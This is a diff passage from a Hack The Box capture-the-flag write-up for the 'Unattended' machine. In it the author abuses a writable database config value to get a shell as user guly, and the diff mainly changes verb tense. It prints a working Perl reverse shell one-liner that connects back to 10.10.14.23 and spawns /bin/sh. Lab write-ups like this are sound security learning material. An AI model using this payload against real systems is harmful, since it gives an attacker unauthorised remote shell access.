slemire/slemire.github.io/_posts/2019-08-24-htb-writeup-unattended.md

 ### Escalating to a new shell as user guly

 I thought about that `checkrelease` parameter in the `config` table I saw earlier.
-It currently contains `/home/guly/checkbase.pl;/home/guly/checkplugins.pl;` so I guessed that this may be a script running at specific interval.
+It currently contains `/home/guly/checkbase.pl;/home/guly/checkplugins.pl;` so I guess that this may be a script running at specific interval.
 I have access to the database so I can change this value.

-I used the standard perl reverse shell payload, then dropped it into `/var/lib/php/sessions` since it's the only directory in the main executable partition I have write access to:
+I use the standard perl reverse shell payload, then drop it into `/var/lib/php/sessions` since it's the only directory in the main executable partition I have write access to:

 ```perl
 use Socket;$i="10.10.14.23";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};